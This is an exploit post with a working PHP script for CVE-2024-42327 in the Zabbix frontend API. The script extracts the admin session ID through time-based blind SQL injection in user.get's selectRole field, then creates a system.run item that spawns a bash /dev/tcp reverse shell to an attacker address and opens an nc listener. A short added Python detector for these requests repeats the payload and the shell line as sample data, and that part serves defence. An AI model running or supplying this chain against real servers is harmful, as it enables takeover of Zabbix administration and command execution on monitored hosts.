
=============================================================================================================================================
| # Title : Zabbix server v 6.4.17rc1 SQL Injection (CVE-2024-42327) to Remote Code Execution |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.zabbix.com/ |
=============================================================================================================================================

POC :

[+] Dorking in Google or other search engines.

[+] Code Description:

The script below exploits CVE-2024-42327, a time-based blind SQL injection in the Zabbix
frontend API: the field list passed as "selectRole" to user.get is concatenated into SQL by
CUser::addRelatedObjects(), and user.get is callable by any account with API access (the
default User role is enough). The script logs in with a low-privileged account, leaks the
active session ID of userid=1 (Admin) one character at a time through a SLEEP() timing
oracle, then uses that session ID as the API auth token to create a Zabbix agent item whose
system.run[] key spawns a reverse shell on the monitored host.

Affected versions (Zabbix advisory ZBX-25623): 6.0.0 - 6.0.31, 6.4.0 - 6.4.16 and 7.0.0;
fixed in 6.0.32rc1, 6.4.17rc1 and 7.0.1rc1, so the version in the title is the first
patched 6.4 build. The final step also requires the agent to permit system.run
(AllowKey=system.run[*] in the agent configuration); it is denied by default since Zabbix 5.0.

[+] Save the code as poc.php.

[+] Set Target : edit $zabbixUrl, $username, $password, $listenIp and $listenPort in the
settings block at the bottom of the script.

[+] Usage : C:\www>php poc.php

[+] PayLoad :

<?php
// Shared request headers (the browser-like User-Agent is cosmetic)
$headers = [
    "Content-Type: application/json",
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
];

// POST one JSON-RPC body to api_jsonrpc.php; returns [response body, seconds the request took]
function apiRequest($url, $data)
{
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $GLOBALS['headers']);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $response = curl_exec($ch);
    $elapsed = curl_getinfo($ch, CURLINFO_TOTAL_TIME);
    curl_close($ch);
    return [$response, $elapsed];
}

// Step 1: log in as any account that has API access (the default User role is enough)
function zabbixAuthenticate($url, $username, $password)
{
    $data = json_encode([
        "jsonrpc" => "2.0",
        "method" => "user.login",
        "params" => [
            "username" => $username,
            "password" => $password
        ],
        "id" => 1
    ]);

    list($response, ) = apiRequest($url, $data);
    $responseJson = json_decode($response, true);
    if (isset($responseJson['result'])) {
        echo "[+] Login successful! Session token: " . $responseJson['result'] . "\n";
        return $responseJson['result'];
    } else {
        echo "[-] Login failed. Response: " . $response . "\n";
        exit();
    }
}

// Step 2: one time-based blind probe. The selectRole field list is spliced into the SQL
// built by CUser::addRelatedObjects() (CVE-2024-42327). The query sleeps $sleepTime seconds
// only when the character at $position (1-based, MID() semantics) of the target session ID
// equals $char. Returns the seconds the request took.
// Note: the sessions table is qualified with the database name "zabbix"; adjust it if the
// target uses another schema name.
function sendInjection($url, $authToken, $position, $char, $sleepTime, $row)
{
    $data = json_encode([
        "jsonrpc" => "2.0",
        "method" => "user.get",
        "params" => [
            "output" => ["userid", "username"],
            "selectRole" => [
                "roleid",
                "name AND (SELECT * FROM (SELECT(SLEEP($sleepTime - (IF(ORD(MID((SELECT sessionid FROM zabbix.sessions WHERE userid=1 and status=0 LIMIT $row,1), $position, 1))=" . ord($char) . ", 0, $sleepTime)))))BEEF)"
            ],
            "editable" => 1,
        ],
        "auth" => $authToken,
        "id" => 1
    ]);

    list(, $elapsed) = apiRequest($url, $data);
    return $elapsed;
}

// Step 3: recover one character of the admin (userid=1) session ID by timing each candidate
function extractApiToken($url, $authToken, $position, $charset, $sleepTime, $row)
{
    foreach (str_split($charset) as $char) {
        $elapsed = sendInjection($url, $authToken, $position, $char, $sleepTime, $row);
        // A hit delays the response by at least $sleepTime seconds; a miss sleeps 0 seconds
        if ($elapsed >= $sleepTime) {
            return $char;
        }
    }
    return null;
}

// Step 4: with the stolen admin session, pick a monitored host and its first interface
function getHostIds($url, $apiTokenAdmin)
{
    $data = json_encode([
        "jsonrpc" => "2.0",
        "method" => "host.get",
        "params" => [
            "output" => ["hostid", "host"],
            "selectInterfaces" => ["interfaceid"]
        ],
        "auth" => $apiTokenAdmin,
        "id" => 1
    ]);

    list($response, ) = apiRequest($url, $data);
    $responseJson = json_decode($response, true);
    if (isset($responseJson['result'][0]['interfaces'][0]['interfaceid'])) {
        $hostId = $responseJson['result'][0]['hostid'];
        $interfaceId = $responseJson['result'][0]['interfaces'][0]['interfaceid'];
        return [$hostId, $interfaceId];
    } else {
        echo "[-] No host with an interface was returned. Response: " . $response . "\n";
        return [null, null];
    }
}

// Step 5: create a Zabbix agent item (type 0, value_type 1 = text) whose key runs a command
// on the agent host. The agent must allow system.run (AllowKey=system.run[*]); it is denied
// by default since Zabbix 5.0.
function sendReverseShellRequest($url, $apiTokenAdmin, $hostId, $interfaceId, $listenIp, $listenPort)
{
    $data = json_encode([
        "jsonrpc" => "2.0",
        "method" => "item.create",
        "params" => [
            "name" => "rce",
            "key_" => "system.run[bash -c \"bash -i >& /dev/tcp/$listenIp/$listenPort 0>&1\"]",
            "delay" => "1s",
            "hostid" => $hostId,
            "type" => 0,
            "value_type" => 1,
            "interfaceid" => $interfaceId,
        ],
        "auth" => $apiTokenAdmin,
        "id" => 1
    ]);

    list($response, ) = apiRequest($url, $data);
    echo "[*] item.create response: " . $response . "\n";
}

// ---- Target settings ----
$zabbixUrl = "http://example.com/api_jsonrpc.php"; // target API endpoint
$username = "admin";                                // any account with API access
$password = "admin";
$listenIp = "10.10.14.5";  // attacker address reachable from the agent host (an IP, not an interface name)
$listenPort = 4444;
$sleepTime = 1;            // seconds of delay per hit; raise it on slow or noisy links
$row = 0;                  // which active admin session to read (0 = first row)
$length = 32;              // Zabbix session IDs are 32 characters
$charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";

// Step 1
$apiToken = zabbixAuthenticate($zabbixUrl, $username, $password);

// Steps 2-3: positions are 1-based because MID() is
$apiTokenAdmin = '';
for ($position = 1; $position <= $length; $position++) {
    $char = extractApiToken($zabbixUrl, $apiToken, $position, $charset, $sleepTime, $row);
    if ($char === null) {
        echo "\n[-] No character matched at position $position (timing threshold too tight or charset incomplete).\n";
        exit();
    }
    $apiTokenAdmin .= $char;
    echo "\r[*] Recovered admin session ID so far: " . $apiTokenAdmin;
    flush();
}

echo "\n[*] Looking up a host and interface with the admin session ...\n";
list($hostId, $interfaceId) = getHostIds($zabbixUrl, $apiTokenAdmin);

if ($hostId && $interfaceId) {
    echo "[*] Creating the system.run item and listening on port $listenPort for the reverse shell ...\n";
    sendReverseShellRequest($zabbixUrl, $apiTokenAdmin, $hostId, $interfaceId, $listenIp, $listenPort);
    // The item fires on the agent's next poll; a listener started in a separate
    // terminal beforehand is more reliable than this inline one.
    passthru("nc -lnvp $listenPort");
} else {
    echo "[-] Could not obtain a host and interface with the recovered session.\n";
}
?>
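The chain above leaves two markers in the API traffic that a defender can look for wherever request bodies are recorded (a reverse proxy in front of the frontend, or the web server's access log with body logging): a user.get call whose selectRole list contains anything other than plain role field names, and an item.create or item.update whose key_ starts with system.run[. The Python below is an added example, not part of indoushka's exploit or of Zabbix itself; it checks constructed JSON-RPC bodies for both markers. The set of legitimate role fields and the sample requests are assumptions made for the illustration.

```python
import json
import re

# Role object fields a client may legitimately request through selectRole
# (assumption: the Zabbix 6.4 role object; extend the set if your version
# exposes more). Anything outside it is attacker text headed for the SQL
# string built by CUser::addRelatedObjects() (CVE-2024-42327).
ROLE_FIELDS = {"roleid", "name", "type", "readonly"}
IDENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
SYSTEM_RUN_RE = re.compile(r"^system\.run\[", re.IGNORECASE)


def inspect_request(body: str) -> list[str]:
    """Return findings for one Zabbix JSON-RPC request body (empty list = clean)."""
    findings: list[str] = []
    try:
        req = json.loads(body)
    except json.JSONDecodeError:
        return ["body is not valid JSON-RPC"]
    if not isinstance(req, dict):
        return ["body is not a JSON-RPC object"]

    method = req.get("method", "")
    params = req.get("params") or {}

    # Marker 1: user.get with a selectRole list containing anything but field names
    if method == "user.get" and isinstance(params, dict):
        select_role = params.get("selectRole")
        if isinstance(select_role, list):
            for field in select_role:
                if not isinstance(field, str) or not IDENT_RE.match(field):
                    findings.append(f"user.get selectRole carries a non-identifier value: {field!r}")
                elif field not in ROLE_FIELDS:
                    findings.append(f"user.get selectRole requests an unknown role field: {field!r}")
        elif select_role is not None and select_role != "extend":
            findings.append(f"user.get selectRole has an unexpected shape: {select_role!r}")

    # Marker 2: an item whose key executes a command on the agent host
    if method in ("item.create", "item.update"):
        items = params if isinstance(params, list) else [params]
        for item in items:
            key = str(item.get("key_", "")) if isinstance(item, dict) else ""
            if SYSTEM_RUN_RE.match(key):
                findings.append(f"{method} installs a remote-command item: {key}")
    return findings


def scan_log(lines: list[str]) -> dict[int, list[str]]:
    """Line index -> findings for every request that is not clean."""
    return {i: f for i, line in enumerate(lines) if (f := inspect_request(line))}


# Constructed sample request bodies (not captured traffic): a benign call, the
# time-based payload used by the PoC above, and the follow-on item.create.
SAMPLE_REQUESTS = [
    json.dumps({"jsonrpc": "2.0", "method": "user.get",
                "params": {"output": ["userid", "username"], "selectRole": ["roleid", "name"]},
                "auth": "a" * 32, "id": 1}),
    json.dumps({"jsonrpc": "2.0", "method": "user.get",
                "params": {"output": ["userid"],
                           "selectRole": ["roleid",
                                          "name AND (SELECT * FROM (SELECT(SLEEP(1 - (IF(ORD(MID((SELECT sessionid "
                                          "FROM zabbix.sessions WHERE userid=1 and status=0 LIMIT 0,1), 1, 1))=97, 0, 1)))))BEEF)"],
                           "editable": 1},
                "auth": "a" * 32, "id": 1}),
    json.dumps({"jsonrpc": "2.0", "method": "item.create",
                "params": {"name": "rce",
                           "key_": "system.run[bash -c \"bash -i >& /dev/tcp/10.10.14.5/4444 0>&1\"]",
                           "delay": "1s", "hostid": "10084", "type": 0, "value_type": 1, "interfaceid": "1"},
                "auth": "b" * 32, "id": 1}),
]

if __name__ == "__main__":
    for idx, findings in scan_log(SAMPLE_REQUESTS).items():
        for finding in findings:
            print(f"request {idx}: {finding}")
```

Run it as-is to see the two flagged sample requests; to use it on real data, feed scan_log() one JSON-RPC body per line. Matching on the selectRole shape rather than on SQL keywords is deliberate: the legitimate values are a closed set of identifiers, so any other string is suspicious regardless of how the injection is obfuscated.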


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================